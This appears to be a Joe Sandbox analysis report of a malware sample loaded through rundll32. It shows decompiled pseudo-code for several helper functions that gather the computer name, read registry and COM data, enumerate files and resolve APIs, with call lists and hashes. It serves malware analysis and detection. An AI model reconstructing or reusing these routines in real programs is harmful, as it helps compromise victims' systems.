                                          control_flow_graph 405 4fd68cf-4fd68e9 call 4fd9138 408 4fd68ee-4fd6910 call 4fd1b13 405->408 409 4fd68eb 405->409 412 4fd69cf-4fd69d4 408->412 413 4fd6916-4fd6930 StrToIntExW 408->413 409->408 414 4fd69db-4fd69e1 412->414 415 4fd69d6 call 4fd568a 412->415 416 4fd69bf-4fd69c1 413->416 417 4fd6936-4fd6952 call 4fd5fcb 413->417 415->414 420 4fd69c2-4fd69cd HeapFree 416->420 417->420 422 4fd6954-4fd696d call 4fd75e7 417->422 420->412 425 4fd698f-4fd69ab call 4fd1bc1 422->425 426 4fd696f-4fd6976 422->426 430 4fd69b0-4fd69bd HeapFree 425->430 426->425 427 4fd6978-4fd698a call 4fd75e7 426->427 427->425 430->420
                                          C-Code - Quality: 100%
                                          			E04FD68CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E04FD9138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4fdd2a4; // 0x254a5a8
				_t4 = _t24 + 0x4fdede0; // 0x7529388
				_t5 = _t24 + 0x4fded88; // 0x4f0053
				_t26 = E04FD1B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4fdd2a4; // 0x254a5a8
						_t11 = _t32 + 0x4fdedd4; // 0x752937c
						_t48 = _t11;
						_t12 = _t32 + 0x4fded88; // 0x4f0053
						_t51 = E04FD5FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x4fdd2a4; // 0x254a5a8
							_t13 = _t35 + 0x4fdea59; // 0x30314549
							if(E04FD75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x4fdd25c - 6;
								if( *0x4fdd25c <= 6) {
									_t42 =  *0x4fdd2a4; // 0x254a5a8
									_t15 = _t42 + 0x4fdec3a; // 0x52384549
									E04FD75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x4fdd2a4; // 0x254a5a8
							_t17 = _t38 + 0x4fdee18; // 0x75293c0
							_t18 = _t38 + 0x4fdedf0; // 0x680043
							_t40 = E04FD1BC1(_v8, 0x80000001, _t51, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x4fdd238, 0, _t51);
						}
					}
					HeapFree( *0x4fdd238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E04FD568A(_t53);
				}
				return _t45;
			}


















                                          0x04fd68df
                                          0x04fd68e2
                                          0x04fd68e9
                                          0x04fd68eb
                                          0x04fd68eb
                                          0x04fd68ee
                                          0x04fd68f3
                                          0x04fd68fa
                                          0x04fd6907
                                          0x04fd690c
                                          0x04fd6910
                                          0x04fd691e
                                          0x04fd692c
                                          0x04fd6930
                                          0x04fd69c1
                                          0x04fd69c1
                                          0x04fd6936
                                          0x04fd6936
                                          0x04fd693b
                                          0x04fd693b
                                          0x04fd6942
                                          0x04fd694e
                                          0x04fd6950
                                          0x04fd6952
                                          0x04fd6954
                                          0x04fd695b
                                          0x04fd696d
                                          0x04fd696f
                                          0x04fd6976
                                          0x04fd6978
                                          0x04fd697f
                                          0x04fd698a
                                          0x04fd698a
                                          0x04fd6976
                                          0x04fd698f
                                          0x04fd6994
                                          0x04fd699b
                                          0x04fd69ab
                                          0x04fd69b9
                                          0x04fd69bb
                                          0x04fd69bb
                                          0x04fd6952
                                          0x04fd69cd
                                          0x04fd69cd
                                          0x04fd69cf
                                          0x04fd69d4
                                          0x04fd69d6
                                          0x04fd69d6
                                          0x04fd69e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,07529388,00000000,?,7519F710,00000000,7519F730), ref: 04FD691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,075293C0,?,00000000,30314549,00000014,004F0053,0752937C), ref: 04FD69BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04FD9C10), ref: 04FD69CD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 84be74839cf415ccd0d32292fb2f40a0d1faa19c58a12b83da0b2eab22dc55c6
                                          • Instruction ID: ac18c35246cf348f7ef99f98cd54174456158be56f71756b1f2fa3466961f04a
                                          • Opcode Fuzzy Hash: 84be74839cf415ccd0d32292fb2f40a0d1faa19c58a12b83da0b2eab22dc55c6
                                          • Instruction Fuzzy Hash: BF316B72A00109BFEB11EBA4ED84EAE7BBFEF04704F190169B505AB150D771EE06DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD9F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04FD9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x4fdd2a4; // 0x254a5a8
				_push(0x800);
				_push(0);
				_push( *0x4fdd238);
				_t1 = _t43 + 0x4fde791; // 0x6976612e
				_t44 = _t1;
				if( *0x4fdd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x4fdd24c =  *0x4fdd24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04FD7CF7(_a4, _t41); // executed
						_t19 = E04FD60CF(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x4fdd24c < 5) {
								 *0x4fdd24c =  *0x4fdd24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E04FD6106();
						RtlFreeHeap( *0x4fdd238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E04FD514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t25 = E04FD1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}












                                          0x04fd9f11
                                          0x04fd9f11
                                          0x04fd9f14
                                          0x04fd9f15
                                          0x04fd9f1f
                                          0x04fd9f26
                                          0x04fd9f2b
                                          0x04fd9f2d
                                          0x04fd9f33
                                          0x04fd9f33
                                          0x04fd9f39
                                          0x04fd9f61
                                          0x04fd9f79
                                          0x04fd9f7b
                                          0x04fd9f7c
                                          0x04fd9f7e
                                          0x04fd9fbc
                                          0x04fd9fbc
                                          0x04fd9fc2
                                          0x04fd9fc8
                                          0x04fd9fc8
                                          0x04fd9f80
                                          0x04fd9f86
                                          0x04fd9f89
                                          0x04fd9f98
                                          0x04fd9f9a
                                          0x04fd9fa1
                                          0x04fd9fd5
                                          0x04fd9fda
                                          0x04fd9fdc
                                          0x04fd9fde
                                          0x04fd9fde
                                          0x00000000
                                          0x04fd9fdc
                                          0x04fd9fa3
                                          0x04fd9fa8
                                          0x04fd9fb6
                                          0x00000000
                                          0x04fd9fb6
                                          0x04fd9f70
                                          0x04fd9f75
                                          0x04fd9f75
                                          0x00000000
                                          0x04fd9f75
                                          0x04fd9f43
                                          0x00000000
                                          0x00000000
                                          0x04fd9f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04FD9F3B
                                            • Part of subcall function 04FD1754: GetTickCount.KERNEL32 ref: 04FD1768
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD17B8
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD17D5
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD1801
                                            • Part of subcall function 04FD1754: HeapFree.KERNEL32(00000000,?), ref: 04FD1813
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD1834
                                            • Part of subcall function 04FD1754: HeapFree.KERNEL32(00000000,?), ref: 04FD1844
                                            • Part of subcall function 04FD1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04FD1872
                                            • Part of subcall function 04FD1754: GetTickCount.KERNEL32 ref: 04FD1883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04FD9F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04FD9C62,00000002,?,?,?,?), ref: 04FD9FB6
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 69507fe3b5867d823cf656e96ea75c381031b7e7dc76bf507ecf7139792621cd
                                          • Instruction ID: a3a66bb6f058d891757eaa79ec998c142f2fdb20829bbb4fb9c12e66658ea712
                                          • Opcode Fuzzy Hash: 69507fe3b5867d823cf656e96ea75c381031b7e7dc76bf507ecf7139792621cd
                                          • Instruction Fuzzy Hash: 3F2180B6201209EBEB15AFA8EC44E9A37AEEF48345F044015F902DB240D7B4FD46DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E04FD642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04FD4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4fdd2a4; // 0x254a5a8
						_t20 = _t68 + 0x4fde1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04FD5103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x04fd6432
                                          0x04fd6435
                                          0x04fd6445
                                          0x04fd644e
                                          0x04fd6452
                                          0x04fd6520
                                          0x04fd6526
                                          0x04fd6526
                                          0x04fd646c
                                          0x04fd6471
                                          0x04fd6475
                                          0x04fd647b
                                          0x04fd6480
                                          0x04fd6487
                                          0x04fd6496
                                          0x04fd6496
                                          0x04fd649a
                                          0x04fd649c
                                          0x04fd64a8
                                          0x04fd64b3
                                          0x04fd64be
                                          0x04fd64c2
                                          0x04fd64cc
                                          0x04fd64d0
                                          0x04fd64d2
                                          0x04fd64d7
                                          0x04fd64de
                                          0x04fd64ee
                                          0x04fd64ee
                                          0x04fd64d7
                                          0x04fd64d0
                                          0x04fd64f0
                                          0x04fd64f5
                                          0x04fd64fa
                                          0x04fd64fa
                                          0x04fd64fd
                                          0x04fd6506
                                          0x04fd650b
                                          0x04fd650b
                                          0x04fd6510
                                          0x04fd6515
                                          0x04fd6515
                                          0x04fd6510
                                          0x04fd649a
                                          0x04fd6517
                                          0x04fd651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04FD4FFA: SysAllocString.OLEAUT32(80000002), ref: 04FD5057
                                            • Part of subcall function 04FD4FFA: SysFreeString.OLEAUT32(00000000), ref: 04FD50BD
                                          • SysFreeString.OLEAUT32(?), ref: 04FD650B
                                          • SysFreeString.OLEAUT32(04FDA6F4), ref: 04FD6515
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: fad7f6927827a51375c05fefd9d97cfbb957c90b06715cb73909f41f3b8e0128
                                          • Instruction ID: e2b1e0120918f85f1df8459a1639838abb165d7298fdf520b60b708d8361852d
                                          • Opcode Fuzzy Hash: fad7f6927827a51375c05fefd9d97cfbb957c90b06715cb73909f41f3b8e0128
                                          • Instruction Fuzzy Hash: 64312872900159AFDB21DF68CC88C9BBB7AFFC97447194658F815DB214E231ED92CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD6C68, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(04FD9642), ref: 04FD6C81
                                            • Part of subcall function 04FD642C: SysFreeString.OLEAUT32(?), ref: 04FD650B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD6CC2
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: c15ede995921f9de943bac511a6c341e2f1fd3f93d8955703235b48c6a05de8b
                                          • Instruction ID: 0251c430999c281dda16e77c7a48f4dfa8fd2d6de9f41d68613ed7198f8e4612
                                          • Opcode Fuzzy Hash: c15ede995921f9de943bac511a6c341e2f1fd3f93d8955703235b48c6a05de8b
                                          • Instruction Fuzzy Hash: 6E01623650110EBFDB019FA8D9088AF7BBAEF48711B054126F909E7121E7309D15CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD73E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04FD73E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04FD58BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04FD147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x04fd73ee
                                          0x04fd73f9
                                          0x04fd73fb
                                          0x04fd7401
                                          0x04fd7403
                                          0x04fd7408
                                          0x04fd7411
                                          0x04fd7415
                                          0x04fd741e
                                          0x04fd7422
                                          0x04fd7431
                                          0x04fd7424
                                          0x04fd7425
                                          0x04fd742a
                                          0x04fd742a
                                          0x04fd7422
                                          0x04fd7415
                                          0x04fd743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04FD51DC,7519F710,00000000,?,?,04FD51DC), ref: 04FD7401
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04FD51DC,04FD51DD,?,?,04FD51DC), ref: 04FD741E
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 3a15cac9f287db6b99271565458d858f82c27bad0700404a52e32b37ad1cfb85
                                          • Instruction ID: d8396fbd6f6b4b3e9e4ebb0a8d6359176b441b15cb83cb3196c4fc0398f21d12
                                          • Opcode Fuzzy Hash: 3a15cac9f287db6b99271565458d858f82c27bad0700404a52e32b37ad1cfb85
                                          • Instruction Fuzzy Hash: 4AF05B26A40149FAE711EAB58D05E9F7AFEDBC6650F190059A504D7140EA74FF0296B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD7BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E04FD7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4fdd2a4; // 0x254a5a8
				_t4 = _t15 + 0x4fde39c; // 0x7528944
				_t20 = _t4;
				_t6 = _t15 + 0x4fde124; // 0x650047
				_t17 = E04FD642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04FD4CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x04fd7bb3
                                          0x04fd7bba
                                          0x04fd7bbb
                                          0x04fd7bbc
                                          0x04fd7bbd
                                          0x04fd7bc3
                                          0x04fd7bc8
                                          0x04fd7bc8
                                          0x04fd7bd2
                                          0x04fd7be4
                                          0x04fd7beb
                                          0x04fd7c19
                                          0x04fd7bed
                                          0x04fd7bef
                                          0x04fd7bf4
                                          0x04fd7c16
                                          0x04fd7bf6
                                          0x04fd7bf9
                                          0x04fd7c00
                                          0x04fd7c05
                                          0x04fd7c07
                                          0x04fd7c07
                                          0x04fd7c0c
                                          0x04fd7c0c
                                          0x04fd7bf4
                                          0x04fd7c20

                                          APIs
                                            • Part of subcall function 04FD642C: SysFreeString.OLEAUT32(?), ref: 04FD650B
                                            • Part of subcall function 04FD4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04FD358E,004F0053,00000000,?), ref: 04FD4CDC
                                            • Part of subcall function 04FD4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04FD358E,004F0053,00000000,?), ref: 04FD4D06
                                            • Part of subcall function 04FD4CD3: memset.NTDLL ref: 04FD4D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD7C0C
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: e2c4452feef3dee49a592a1a15acf8d37d3d8e60e727bfd349619ad26c339ed8
                                          • Instruction ID: 62dd39508604a8ac0f60358896c6cbe9a4b1cbc440a01984d23ad0972d512d38
                                          • Opcode Fuzzy Hash: e2c4452feef3dee49a592a1a15acf8d37d3d8e60e727bfd349619ad26c339ed8
                                          • Instruction Fuzzy Hash: 4B017C3260051ABFEB11AFA8DD049ABBBFAEB08254F044525ED05EB161E371E952CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD58BE, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD58BE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4fdd238, 0, _a4); // executed
				return _t2;
			}




                                          0x04fd58ca
                                          0x04fd58d0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0820bd628f1d4489f0bbd425bd497c08d0e3c520823d0e57feccc229e6597a4a
                                          • Instruction ID: c748d19b5b7ef46438dcc205e75d215cb804ad96c52edfa4af766566f6aa21c2
                                          • Opcode Fuzzy Hash: 0820bd628f1d4489f0bbd425bd497c08d0e3c520823d0e57feccc229e6597a4a
                                          • Instruction Fuzzy Hash: 2AB01231001104EBDF015F60FD0CF05BB23EB50701F028014B200440B483354C20FB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD9347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E04FD9347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x4fdd330;
				E04FD684E();
				while(1) {
					_t8 = E04FD32BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04FDA5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x4fdd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04FD684E();
					if(_t19 != 0) {
						_t22 =  *0x4fdd338; // 0x7529b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x04fd934f
                                          0x04fd9353
                                          0x04fd9354
                                          0x04fd9355
                                          0x04fd935a
                                          0x04fd935f
                                          0x04fd9366
                                          0x04fd936d
                                          0x00000000
                                          0x00000000
                                          0x04fd936f
                                          0x04fd9374
                                          0x04fd9375
                                          0x04fd937c
                                          0x04fd9396
                                          0x00000000
                                          0x04fd937e
                                          0x04fd937e
                                          0x04fd9380
                                          0x04fd9383
                                          0x04fd9387
                                          0x00000000
                                          0x00000000
                                          0x04fd9389
                                          0x04fd9387
                                          0x04fd939e
                                          0x04fd939e
                                          0x04fd93a0
                                          0x04fd93a7
                                          0x04fd93a9
                                          0x04fd93af
                                          0x04fd93b6
                                          0x04fd93c6
                                          0x04fd93be
                                          0x04fd93c1
                                          0x04fd93c1
                                          0x04fd93c9
                                          0x04fd93c9
                                          0x04fd93d2
                                          0x04fd93d2
                                          0x04fd939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04FD684E: GetProcAddress.KERNEL32(36776F57,04FD935F), ref: 04FD6869
                                            • Part of subcall function 04FD32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04FD32E5
                                            • Part of subcall function 04FD32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04FD3307
                                            • Part of subcall function 04FD32BA: memset.NTDLL ref: 04FD3321
                                            • Part of subcall function 04FD32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04FD335F
                                            • Part of subcall function 04FD32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04FD3373
                                            • Part of subcall function 04FD32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 04FD338A
                                            • Part of subcall function 04FD32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04FD3396
                                            • Part of subcall function 04FD32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 04FD33D7
                                            • Part of subcall function 04FD32BA: FindFirstFileA.KERNEL32(?,?), ref: 04FD33ED
                                            • Part of subcall function 04FDA5E9: lstrlen.KERNEL32(?,00000000,04FDD330,00000001,04FD937A,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?), ref: 04FDA5F2
                                            • Part of subcall function 04FDA5E9: mbstowcs.NTDLL ref: 04FDA619
                                            • Part of subcall function 04FDA5E9: memset.NTDLL ref: 04FDA62B
                                          • HeapFree.KERNEL32(00000000,04FDD00C,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?,04FDD00C,?,?), ref: 04FD9396
                                          Memory Dump Source
